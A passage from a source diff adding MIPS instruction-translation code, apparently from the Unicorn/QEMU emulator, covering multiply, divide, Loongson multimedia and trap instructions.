tcg_gen_rem_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddiv"; + break; + case OPC_DDIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_i64(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_remu_i64(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddivu"; + break; + case OPC_DMULT: + tcg_gen_muls2_i64(tcg_ctx, *cpu_LO[acc], *cpu_HI[acc], t0, t1); + opn = "dmult"; + break; + case OPC_DMULTU: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_LO[acc], *cpu_HI[acc], t0, t1); + opn = "dmultu"; + break; +#endif + case OPC_MADD: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); + tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_add_i64(tcg_ctx, t2, t2, t3); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "madd"; + break; + case OPC_MADDU: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); + tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_add_i64(tcg_ctx, t2, t2, t3); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "maddu"; + break; + case OPC_MSUB: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); + tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "msub"; + break; + case OPC_MSUBU: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); + tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "msubu"; + break; + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rs], regnames[rt]); + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_mul_vr54xx (DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "mul vr54xx"; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case OPC_VR54XX_MULS: + gen_helper_muls(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "muls"; + break; + case OPC_VR54XX_MULSU: + gen_helper_mulsu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulsu"; + break; + case OPC_VR54XX_MACC: + gen_helper_macc(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macc"; + break; + case OPC_VR54XX_MACCU: + gen_helper_maccu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "maccu"; + break; + case OPC_VR54XX_MSAC: + gen_helper_msac(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msac"; + break; + case OPC_VR54XX_MSACU: + gen_helper_msacu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msacu"; + break; + case OPC_VR54XX_MULHI: + gen_helper_mulhi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulhi"; + break; + case OPC_VR54XX_MULHIU: + gen_helper_mulhiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulhiu"; + break; + case OPC_VR54XX_MULSHI: + gen_helper_mulshi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulshi"; + break; + case OPC_VR54XX_MULSHIU: + gen_helper_mulshiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulshiu"; + break; + case OPC_VR54XX_MACCHI: + gen_helper_macchi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macchi"; + break; + case OPC_VR54XX_MACCHIU: + gen_helper_macchiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macchiu"; + break; + case OPC_VR54XX_MSACHI: + gen_helper_msachi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msachi"; + break; + case OPC_VR54XX_MSACHIU: + gen_helper_msachiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msachiu"; + break; + default: + MIPS_INVAL("mul vr54xx"); + generate_exception(ctx, EXCP_RI); + goto out; + } + gen_store_gpr(tcg_ctx, t0, rd); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_cl (DisasContext *ctx, uint32_t opc, + int rd, int rs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "CLx"; + TCGv t0; + + if (rd == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + switch (opc) { + case OPC_CLO: + case R6_OPC_CLO: + gen_helper_clo(tcg_ctx, *cpu_gpr[rd], t0); + opn = "clo"; + break; + case OPC_CLZ: + case R6_OPC_CLZ: + gen_helper_clz(tcg_ctx, *cpu_gpr[rd], t0); + opn = "clz"; + break; +#if defined(TARGET_MIPS64) + case OPC_DCLO: + case R6_OPC_DCLO: + gen_helper_dclo(tcg_ctx, *cpu_gpr[rd], t0); + opn = "dclo"; + break; + case OPC_DCLZ: + case R6_OPC_DCLZ: + gen_helper_dclz(tcg_ctx, *cpu_gpr[rd], t0); + opn = "dclz"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s", opn, regnames[rd], regnames[rs]); + tcg_temp_free(tcg_ctx, t0); +} + +/* Godson integer instructions */ +static void gen_loongson_integer(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "loongson"; + TCGv t0, t1; + + if (rd == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_MULT_G_2E: + case OPC_MULT_G_2F: + case OPC_MULTU_G_2E: + case OPC_MULTU_G_2F: +#if defined(TARGET_MIPS64) + case OPC_DMULT_G_2E: + case OPC_DMULT_G_2F: + case OPC_DMULTU_G_2E: + case OPC_DMULTU_G_2F: +#endif + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + break; + default: + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + break; + } + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case OPC_MULT_G_2E: + case OPC_MULT_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + opn = "mult.g"; + break; + case OPC_MULTU_G_2E: + case OPC_MULTU_G_2F: + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + opn = "multu.g"; + break; + case OPC_DIV_G_2E: + case OPC_DIV_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l3); + } + opn = "div.g"; + break; + case OPC_DIVU_G_2E: + case OPC_DIVU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l2); + } + opn = "divu.g"; + break; + case OPC_MOD_G_2E: + case OPC_MOD_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l3); + } + opn = "mod.g"; + break; + case OPC_MODU_G_2E: + case OPC_MODU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l2); + } + opn = "modu.g"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMULT_G_2E: + case OPC_DMULT_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmult.g"; + break; + case OPC_DMULTU_G_2E: + case OPC_DMULTU_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmultu.g"; + break; + case OPC_DDIV_G_2E: + case OPC_DDIV_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1ULL << 63, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l3); + } + opn = "ddiv.g"; + break; + case OPC_DDIVU_G_2E: + case OPC_DDIVU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l2); + } + opn = "ddivu.g"; + break; + case OPC_DMOD_G_2E: + case OPC_DMOD_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1ULL << 63, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l3); + } + opn = "dmod.g"; + break; + case OPC_DMODU_G_2E: + case OPC_DMODU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l2); + } + opn = "dmodu.g"; + break; +#endif + } + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s", opn, regnames[rd], regnames[rs]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Loongson multimedia instructions */ +static void gen_loongson_multimedia(DisasContext *ctx, int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "loongson_cp2"; + uint32_t opc, shift_max; + TCGv_i64 t0, t1; + + opc = MASK_LMI(ctx->opcode); + switch (opc) { + case OPC_ADD_CP2: + case OPC_SUB_CP2: + case OPC_DADD_CP2: + case OPC_DSUB_CP2: + t0 = tcg_temp_local_new_i64(tcg_ctx); + t1 = tcg_temp_local_new_i64(tcg_ctx); + break; + default: + t0 = tcg_temp_new_i64(tcg_ctx); + t1 = tcg_temp_new_i64(tcg_ctx); + break; + } + + gen_load_fpr64(ctx, t0, rs); + gen_load_fpr64(ctx, t1, rt); + +#define LMI_HELPER(UP, LO) \ + case OPC_##UP: gen_helper_##LO(tcg_ctx, t0, t0, t1); opn = #LO; break +#define LMI_HELPER_1(UP, LO) \ + case OPC_##UP: gen_helper_##LO(tcg_ctx, t0, t0); opn = #LO; break +#define LMI_DIRECT(UP, LO, OP) \ + case OPC_##UP: tcg_gen_##OP##_i64(tcg_ctx, t0, t0, t1); opn = #LO; break + + switch (opc) { + LMI_HELPER(PADDSH, paddsh); + LMI_HELPER(PADDUSH, paddush); + LMI_HELPER(PADDH, paddh); + LMI_HELPER(PADDW, paddw); + LMI_HELPER(PADDSB, paddsb); + LMI_HELPER(PADDUSB, paddusb); + LMI_HELPER(PADDB, paddb); + + LMI_HELPER(PSUBSH, psubsh); + LMI_HELPER(PSUBUSH, psubush); + LMI_HELPER(PSUBH, psubh); + LMI_HELPER(PSUBW, psubw); + LMI_HELPER(PSUBSB, psubsb); + LMI_HELPER(PSUBUSB, psubusb); + LMI_HELPER(PSUBB, psubb); + + LMI_HELPER(PSHUFH, pshufh); + LMI_HELPER(PACKSSWH, packsswh); + LMI_HELPER(PACKSSHB, packsshb); + LMI_HELPER(PACKUSHB, packushb); + + LMI_HELPER(PUNPCKLHW, punpcklhw); + LMI_HELPER(PUNPCKHHW, punpckhhw); + LMI_HELPER(PUNPCKLBH, punpcklbh); + LMI_HELPER(PUNPCKHBH, punpckhbh); + LMI_HELPER(PUNPCKLWD, punpcklwd); + LMI_HELPER(PUNPCKHWD, punpckhwd); + + LMI_HELPER(PAVGH, pavgh); + LMI_HELPER(PAVGB, pavgb); + LMI_HELPER(PMAXSH, pmaxsh); + LMI_HELPER(PMINSH, pminsh); + LMI_HELPER(PMAXUB, pmaxub); + LMI_HELPER(PMINUB, pminub); + + LMI_HELPER(PCMPEQW, pcmpeqw); + LMI_HELPER(PCMPGTW, pcmpgtw); + LMI_HELPER(PCMPEQH, pcmpeqh); + LMI_HELPER(PCMPGTH, pcmpgth); + LMI_HELPER(PCMPEQB, pcmpeqb); + LMI_HELPER(PCMPGTB, pcmpgtb); + + LMI_HELPER(PSLLW, psllw); + LMI_HELPER(PSLLH, psllh); + LMI_HELPER(PSRLW, psrlw); + LMI_HELPER(PSRLH, psrlh); + LMI_HELPER(PSRAW, psraw); + LMI_HELPER(PSRAH, psrah); + + LMI_HELPER(PMULLH, pmullh); + LMI_HELPER(PMULHH, pmulhh); + LMI_HELPER(PMULHUH, pmulhuh); + LMI_HELPER(PMADDHW, pmaddhw); + + LMI_HELPER(PASUBUB, pasubub); + LMI_HELPER_1(BIADD, biadd); + LMI_HELPER_1(PMOVMSKB, pmovmskb); + + LMI_DIRECT(PADDD, paddd, add); + LMI_DIRECT(PSUBD, psubd, sub); + LMI_DIRECT(XOR_CP2, xor, xor); + LMI_DIRECT(NOR_CP2, nor, nor); + LMI_DIRECT(AND_CP2, and, and); + LMI_DIRECT(PANDN, pandn, andc); + LMI_DIRECT(OR, or, or); + + case OPC_PINSRH_0: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 0, 16); + opn = "pinsrh_0"; + break; + case OPC_PINSRH_1: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 16, 16); + opn = "pinsrh_1"; + break; + case OPC_PINSRH_2: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 16); + opn = "pinsrh_2"; + break; + case OPC_PINSRH_3: + tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 48, 16); + opn = "pinsrh_3"; + break; + + case OPC_PEXTRH: + tcg_gen_andi_i64(tcg_ctx, t1, t1, 3); + tcg_gen_shli_i64(tcg_ctx, t1, t1, 4); + tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext16u_i64(tcg_ctx, t0, t0); + opn = "pextrh"; + break; + + case OPC_ADDU_CP2: + tcg_gen_add_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + opn = "addu"; + break; + case OPC_SUBU_CP2: + tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + opn = "addu"; + break; + + case OPC_SLL_CP2: + opn = "sll"; + shift_max = 32; + goto do_shift; + case OPC_SRL_CP2: + opn = "srl"; + shift_max = 32; + goto do_shift; + case OPC_SRA_CP2: + opn = "sra"; + shift_max = 32; + goto do_shift; + case OPC_DSLL_CP2: + opn = "dsll"; + shift_max = 64; + goto do_shift; + case OPC_DSRL_CP2: + opn = "dsrl"; + shift_max = 64; + goto do_shift; + case OPC_DSRA_CP2: + opn = "dsra"; + shift_max = 64; + goto do_shift; + do_shift: + /* Make sure shift count isn't TCG undefined behaviour. */ + tcg_gen_andi_i64(tcg_ctx, t1, t1, shift_max - 1); + + switch (opc) { + case OPC_SLL_CP2: + case OPC_DSLL_CP2: + tcg_gen_shl_i64(tcg_ctx, t0, t0, t1); + break; + case OPC_SRA_CP2: + case OPC_DSRA_CP2: + /* Since SRA is UndefinedResult without sign-extended inputs, + we can treat SRA and DSRA the same. */ + tcg_gen_sar_i64(tcg_ctx, t0, t0, t1); + break; + case OPC_SRL_CP2: + /* We want to shift in zeros for SRL; zero-extend first. */ + tcg_gen_ext32u_i64(tcg_ctx, t0, t0); + /* FALLTHRU */ + case OPC_DSRL_CP2: + tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); + break; + } + + if (shift_max == 32) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + + /* Shifts larger than MAX produce zero. */ + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LTU, t1, t1, shift_max); + tcg_gen_neg_i64(tcg_ctx, t1, t1); + tcg_gen_and_i64(tcg_ctx, t0, t0, t1); + break; + + case OPC_ADD_CP2: + case OPC_DADD_CP2: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + int lab = gen_new_label(tcg_ctx); + + tcg_gen_mov_i64(tcg_ctx, t2, t0); + tcg_gen_add_i64(tcg_ctx, t0, t1, t2); + if (opc == OPC_ADD_CP2) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); + tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); + tcg_gen_andc_i64(tcg_ctx, t1, t2, t1); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, lab); + + opn = (opc == OPC_ADD_CP2 ? "add" : "dadd"); + break; + } + + case OPC_SUB_CP2: + case OPC_DSUB_CP2: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + int lab = gen_new_label(tcg_ctx); + + tcg_gen_mov_i64(tcg_ctx, t2, t0); + tcg_gen_sub_i64(tcg_ctx, t0, t1, t2); + if (opc == OPC_SUB_CP2) { + tcg_gen_ext32s_i64(tcg_ctx, t0, t0); + } + tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); + tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); + tcg_gen_and_i64(tcg_ctx, t1, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, lab); + + opn = (opc == OPC_SUB_CP2 ? "sub" : "dsub"); + break; + } + + case OPC_PMULUW: + tcg_gen_ext32u_i64(tcg_ctx, t0, t0); + tcg_gen_ext32u_i64(tcg_ctx, t1, t1); + tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); + opn = "pmuluw"; + break; + + case OPC_SEQU_CP2: + case OPC_SEQ_CP2: + case OPC_SLTU_CP2: + case OPC_SLT_CP2: + case OPC_SLEU_CP2: + case OPC_SLE_CP2: + /* ??? Document is unclear: Set FCC[CC]. Does that mean the + FD field is the CC field? */ + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + return; + } + +#undef LMI_HELPER +#undef LMI_DIRECT + + gen_store_fpr64(ctx, t0, rd); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, + fregnames[rd], fregnames[rs], fregnames[rt]); + tcg_temp_free_i64(tcg_ctx, t0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +/* Traps */ +static void gen_trap (DisasContext *ctx, uint32_t opc, + int rs, int rt, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + cond = 0; + /* Load needed operands */ + switch (opc) { + case OPC_TEQ: + case OPC_TGE: + case OPC_TGEU: + case OPC_TLT: + case OPC_TLTU: + case OPC_TNE: + /* Compare two registers */ + if (rs != rt) { + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + cond = 1; + } + break; + case OPC_TEQI: + case OPC_TGEI: + case OPC_TGEIU: + case OPC_TLTI: + case OPC_TLTIU: + case OPC_TNEI: + /* Compare register to immediate */ + if (rs != 0 || imm != 0) { + gen_load_gpr(ctx, t0, rs); + tcg_gen_movi_tl(tcg_ctx, t1, (int32_t)imm); + cond = 1; + } + break; + } + if (cond == 0) { + switch (opc) { + case OPC_TEQ: /* rs == rs */ + case OPC_TEQI: /* r0 == 0 */ + case OPC_TGE: /* rs >= rs */ + case OPC_TGEI: /* r0 >= 0 */ + case OPC_TGEU: /* rs >= rs unsigned */ + case OPC_TGEIU: /* r0 >= 0 unsigned */ + /* Always trap */ + generate_exception(ctx, EXCP_TRAP); + break; + case OPC_TLT: /* rs < rs */ + case OPC_TLTI: /* r0 < 0 */ + case OPC_TLTU: /* rs < rs unsigned */ + case OPC_TLTIU: /* r0 < 0 unsigned */ + case OPC_TNE: /* rs != rs */ + case OPC_TNEI: /* r0 != 0 */ + /* Never trap: treat as NOP. */ + break; + } + } else { + int l1 = gen_new_label(tcg_ctx); + + switch (opc) { + case OPC_TEQ: + case OPC_TEQI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t1, l1); + break; + case OPC_TGE: + case OPC_TGEI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LT, t0, t1, l1); + break; + case OPC_TGEU: + case OPC_TGEIU: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LTU, t0, t1, l1); + break; + case OPC_TLT: + case OPC_TLTI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); + break; + case OPC_TLTU: + case OPC_TLTIU: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); + break; + case OPC_TNE: + case OPC_TNEI: + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t0, 